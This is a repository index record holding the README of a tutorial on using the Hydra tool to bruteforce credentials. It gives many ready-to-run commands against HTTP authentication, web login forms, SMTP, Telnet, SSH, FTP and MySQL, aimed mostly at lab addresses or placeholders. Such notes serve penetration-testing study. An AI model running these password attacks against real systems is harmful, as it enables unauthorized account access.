{"id":20134562,"url":"https://github.com/gnebbia/hydra_notes","last_synced_at":"2025-06-23T01:37:48.160Z","repository":{"id":51973074,"uuid":"144217304","full_name":"gnebbia/hydra_notes","owner":"gnebbia","description":"Some notes about Hydra for bruteforcing","archived":false,"fork":false,"pushed_at":"2020-03-11T20:47:16.000Z","size":43,"stargazers_count":173,"open_issues_count":2,"forks_count":31,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-01-13T09:27:26.845Z","etag":null,"topics":["hydra","notes","thc-hydra","tutorial"],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/gnebbia.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-08-10T00:33:44.000Z","updated_at":"2025-01-01T13:25:15.000Z","dependencies_parsed_at":"2022-08-27T02:28:21.542Z","dependency_job_id":null,"html_url":"https://github.com/gnebbia/hydra_notes","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gnebbia%2Fhydra_notes","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gnebbia%2Fhydra_notes/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gnebbia%2Fhydra_notes/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gnebbia%2Fhydra_notes/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/gnebbia","download_url":"https://codeload.github.com/gnebbia/hydra_notes/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github"
,"repositories_count":241581117,"owners_count":19985696,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hydra","notes","thc-hydra","tutorial"],"created_at":"2024-11-13T21:09:59.506Z","updated_at":"2025-03-02T22:28:04.158Z","avatar_url":"https://github.com/gnebbia.png","language":null,"readme":"# Hydra notes\n\nHydra is a very useful tool for bruteforcing credentials\non most commonly used protocols.\nWe are going to start with some flags which are generally used independently\nfrom the protocol, so in the examples when we will see these flags, we can\nimmediately understand what they are used for.\nHere is a list of common and general flags used with Hydra:\n\n* `-L \u003cfilepath\u003e` for the file path to use for usernames, separated by newlines\n* `-P \u003cfilepath\u003e` for the file path to use for passwords, separated by newlines\n* `-C \u003cfilepath\u003e` this is an alternative to -L and -P, since we can provide a unique file\n    which contains both user and password, separated by a colon, like\n    user1:passwdrandom\n    user2:minestrone\n    root:toor\n    ...\n* `-t \u003cinteger\u003e` is the number of threads to use\n* `-o \u003cfilepath\u003e` allows us to specify an output file where to save results\n* `-w \u003cinteger\u003e` specifies the number of seconds to wait between consecutive\n    requests\n* `-s \u003cinteger\u003e` specifies the port number to use\n* `-v` activates the verbose mode, to give us an idea of what is happening\n    behind the scenes, so we will see each attempt, and the current combination\n    of credentials 
which is being tested\n* `-S` performs a connection using SSL\n* `-l \u003cusername\u003e` uses a single user for login instead of a list/file, so we can specify\n    instead of -L a single user with `-l root` or `-l usrname1`\n* `-M \u003cfilepath\u003e` with this option we can specify a file which will contain on\n    each line a different IP or website or resource, in order to perform \n    parallel cracking\n* `-f` this flag when activated, will let hydra terminate as soon as it finds a\n    single correct credential pair, so as soon as it succeeds it exits, this\n    happens per host if we specify -M (so a set of machines)\n* `-F` exits after the first found login/password pair for any host (for usage with -M)\n\n\n## HTTP\n\n\n### HTTP Basic Authentication\nWe can use the following commands for Basic HTTP Authentication, we can\nunderstand that the authentication is basic from the headers of the response.\n\n```sh\nhydra -L users.txt -P words.txt www.site.com http-head /private/\n# we provide users.txt as files containing users\n# then words.txt as the password file and then we try\n# a basic http authentication by using the http-head parameter\n# then we provide the page /private/ which is the url path\n# where we are asked for credentials\n```\n\nWe can add with -e combinations to the already existing combinations provided \nfrom the users and password files in particular we can use `n` or `s` or `r` \nor all the combinations of them, their meaning is:\n\n* `n` adds for each user also the null password\n* `s` adds the combination of credentials username/username for each of the\n    usernames\n* `r` adds for each combination username/password also the reversed\n    password/username\n\n```sh\nhydra -L users.txt -P words.txt www.site.com -e ns http-head /private/\n# here we do the same thing as before, but we add combinations with\n# `-e ns`, so we are also trying with an empty password for each\n# of the users and with passwords equal to the username for 
each user\n```\n\n\n### HTTP Digest Authentication\n\n```sh\nhydra -l root -P test.txt -vV localhost http-get /forbidden-d2\n# uses the username root with passwords from the file called test.txt\n# it runs in verbose mode on localhost through http-get module we specify\n# that this is an HTTP digest authentication found at path /forbidden-d2\n```\n\n```sh\nhydra -l admin -P 1000_common_passwords.txt -s 8090 -f 192.168.1.4 http-get /get_camera_params.cgi\n# uses the username admin with passwords from the file called\n# 1000_common_passwords.txt it runs on port 8090 through \n# the -f flag it will stop as soon as it finds the first valid credentials\n# the http-get module is specified to denote the presence of an HTTP digest\n# authentication at the path /get_camera_params.cgi\n```\n\n\n### HTTP Forms\n\nWhen it comes to HTTP login forms, we generally have to inspect the web\napplication, searching for messages which will appear on successful or failed\nlogins.\n\nGenerally for HTTP forms we will have hydra commands with the following\nstructure:\n\n```sh\nhydra -L \u003cusers_file\u003e -P \u003cpassword_file\u003e \u003curl\u003e http[s]-[post|get]-form \\\n\"index.php:param1=value1\u0026param2=value2\u0026user=^USER^\u0026pwd=^PASS^\u0026paramn=valn:[F|S]=messageshowed\"\n```\n\nWhere depending on the webpage and on the post we can have after url:\n* http-get-form, in case of an http page with a get form\n* https-get-form, in case of an https page with a get form\n* http-post-form, in case of an http page with a post form\n* https-post-form, in case of an https page with a post form\n\nand after this a string we specify the \"request string\" which will contain the\nfollowing elements separated by a colon `:`:\n* pageOnWhichTheLoginHappens\n* list of parameters, here we have to specify with ^USER^ and ^PASS^ where\n    usernames and passwords will be inserted\n* a character which may be F (for failing strings) or S for successful strings\n    followed by an equal 
sign `=` and a string which appears in a failed attempt\n    or in a successful attempt, if we do not specify F or S, F is the default\n    also because this is the more natural option, we generally know which\n    strings will appear when we fail a login but not the ones which will appear\n    when it is successful (unless we are dealing with a known web\n    technology/framework).\n    Let's see some examples. We can specify a failure string with `:F=mystringincaseoffailure`\n    while we can specify a success string with `:S=mystringincaseofsuccess`.\n    But we may also see online `:mystring` and it will be the equivalent of\n    `:F=mystring`\n\n\nLet's see some warmup examples:\n\n```sh\nhydra -l admin -P pass.txt https://url.com https-post-form \"index.php:param1=value123\u0026user=^USER^\u0026pass=^PASS^:F=Bad login\"\n # in this example we are in an https post form situation, \n # as we may notice as request line we have the following structure\n # page:parameters:F=message_to_show_in_case_of_failure\n```\n\n```sh\nhydra -l admin -P pass.txt https://url.com https-post-form \"index.php:param1=value123\u0026user=^USER^\u0026pass=^PASS^:S=Success!!\"\n # in this example we are in an https post form situation, \n # as we may notice as request line we have the following structure\n # page:parameters:S=message_to_show_in_case_of_success\n```\n\n\n### HTTP Get Login Forms\n\n```sh\nhydra -l admin -P /root/Desktop/wordlists/test.txt http://www.website.com \\\nhttp-get-form \"/brute/index.php:username=^USER^\u0026password=^PASS^\u0026Login=Login:Username and/or password incorrect.\"\n```\n\n```sh\nhydra  -L /usr/share/seclists/Usernames/top_shortlist.txt -P /usr/share/seclists/Passwords/rockyou-40.txt \\\n  -e ns  -F  -u  -t 1  -w 10  -v  -V  192.168.1.44  http-get-form \\\n\"/DVWA/vulnerabilities/brute/:username=^USER^\u0026password=^PASS^\u0026Login=Login:S=Welcome to the password protected area:H=Cookie\\: security=low; PHPSESSID=${SESSIONID}\"\n```\n\n\n\n\n### 
HTTP Post Login Forms\n\n```sh\nhydra 192.168.1.69 http-post-form \"/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^\u0026pass=^PASS^:Bad login\" \\\n-L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt\n# Here we specified:\n # Host = 192.168.1.69\n # Method = http-form-post\n # URL = /w3af/bruteforce/form_login/dataReceptor.php\n # Form parameters = user=^USER^\u0026pass=^PASS^\n # Failure response = Bad login\n # Users file = users.txt\n # Password file = pass.txt\n # Threads = -t 10\n # Wait for timeout = -w 30\n # Output file = -o hydra-http-post-attack.txt\n```\n\nWe can make more complicated examples, for example by specifying specific\nheaders or cookies with:\n\n```sh\nhydra 192.168.1.69 http-post-form \"/foo.php:user=^USER^\u0026pass=^PASS^:S=success:C=/page/cookie:H=X-Foo: Foo\" \\\n-L users.txt -P pass.txt -t 10 -w 1 -o hydra-http-post-attack.txt\n # in this case we specify that the cookie should be page/cookie\n # cookies can be specified with C=\n # and we also added a header with H= \n # this header is called X-Foo and has as value Foo\n```\n\n\n```sh\nhydra -L users.txt -P words.txt https://www.site.com  https-post-form \"/index.cgi:login\u0026name=^USER^\u0026password=^PASS^\u0026login=Login:Not allowed\" \u0026\n # here we use https-post-form, since the website uses https\n```\n\n\n```sh\nhydra -L lists/usrname.txt -P lists/pass.txt localhost -V http-form-post '/wp-login.php:log=^USER^\u0026pwd=^PASS^\u0026wp-submit=Log In\u0026testcookie=1:S=Location'\n# now we check for success by using S=Location, since wordpress uses a Location\n# header to redirect the user, we can think about S as a sort of grep applied to\n# the HTTP response\n```\n\n## SMTP\n\n```sh\nhydra smtp.victimsemailserver.com smtp -l useraccount@gmail.com -P '/root/Desktop/rockyou.txt' -s portnumber -S -v \n```\nGenerally the port used for SMTP is 465 and common SMTP server for common email\nservices are:\n    * smtp.mail.yahoo.com\n    * smtp.gmail.com\n    
* smtp.live.com (but on port 587)\n\n\n## Telnet\n\n```sh\nhydra -l \u003cusername\u003e -P \u003cpassword_file\u003e telnet://targetname\n```\n\n## SSH\n\n```sh\nhydra -l root -M /path/to/ip/list.txt -P /path/to/passwordlist.txt ssh -t 4\n```\nNotice that with some services, we may need to use the recommended\nnumber of tasks. In case of SSH if we use more than 4 tasks we may get\nerrors.\n\n```sh\nhydra 192.168.1.26 ssh2 -s 22 -P pass.txt -L users.txt -e ns -t 10\n # this will attack the system 192.168.1.26 on port 22\n # and will use as password file pass.txt while\n # for users the file users.txt\n # the process will use 10 threads at a time\n```\n\n\n```sh\nhydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://192.168.1.123\n```\n\n```sh\nhydra -L logins.txt -P pws.txt -M targets.txt ssh\n# tries the users from logins.txt and the passwords from pws.txt\n# on all the machines listed on targets.txt on the ssh port/service\n```\n\n\n## FTP \n\n```sh\nhydra -l root -P 500-worst-passwords.txt 10.10.10.10 ftp\n```\n\n\n```sh\nhydra -l user -P passlist.txt ftp://192.168.0.1\n```\n\n## MySQL and other databases\n\nWe can use hydra with many kinds of databases, anyway it is very important for\nus to check that we have installed hydra with the adequate module to perform a\nspecific bruteforce.\n\n**IMPORTANT**: if we did not install hydra with mysql5 support it will not work,\nwe can check the modules available by issuing a `hydra -h`, if we just see\n`mysql(v4)` this means that our version will not be compatible with `mysql5`,\nwhile if we see `mysql` then our version of hydra will be compatible also with\nmysql5 databases.\n\n```sh\nhydra -L \u003cyour_username_file\u003e -P \u003cyour_password_file\u003e \u003cIP\u003e mysql -s 3306 -o output.txt\n```\nnotice that this is equivalent to:\n\n```sh\nhydra -L \u003cyour_username_file\u003e -P \u003cyour_password_file\u003e \u003cIP\u003e mysql -o output.txt\n # by default mysql uses port 3306 
so we do not need to specify it,\n # anyway it is fundamental to specify it if the mysql port is different\n```\n\n\n## Appendix A: Sending Hydra traffic through Proxy\n\n\nIt is often useful to analyze what we are actually doing with hydra, to this\npurpose we can send the traffic to an intercepting proxy such as Burp.\n\nTo do this, we just have to set an environment variable:\n```sh\nexport HYDRA_PROXY=http://127.0.0.1:8080\n# or\nexport HYDRA_PROXY_HTTP=http://127.0.0.1:8080 \n```\n\nFrom `hydra -v` we can indeed read:\n```sh\nUse HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.\nE.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)\n     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)\n     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080\n     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)\n```\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgnebbia%2Fhydra_notes","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgnebbia%2Fhydra_notes","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgnebbia%2Fhydra_notes/lists"}